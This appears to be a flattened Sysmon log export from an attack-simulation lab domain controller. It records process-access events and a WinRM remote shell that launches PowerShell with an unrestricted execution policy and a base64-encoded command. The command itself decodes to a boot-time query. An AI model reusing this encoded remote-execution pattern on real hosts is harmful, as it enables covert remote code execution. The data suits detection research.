12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E802-00000000AD01}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-6442-6064-E602-00000000AD01}42082736C:\Windows\system32\WinrsHost.exe{266CAFBE-6442-6064-E802-00000000AD01}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.948{266CAFBE-6442-6064-E802-00000000AD01}3900C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6442-6064-7EBF-120000000000}0x12bf7e0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.920{266CAFBE-62DD-6064-1400-00000000AD01}13401756C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.904{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-6442-6064-E702-00000000AD01}43244776C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E702-00000000AD01}4324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.889{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.873{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.888{266CAFBE-6442-6064-E602-00000000AD01}4208C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6442-6064-7EBF-120000000000}0x12bf7e0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 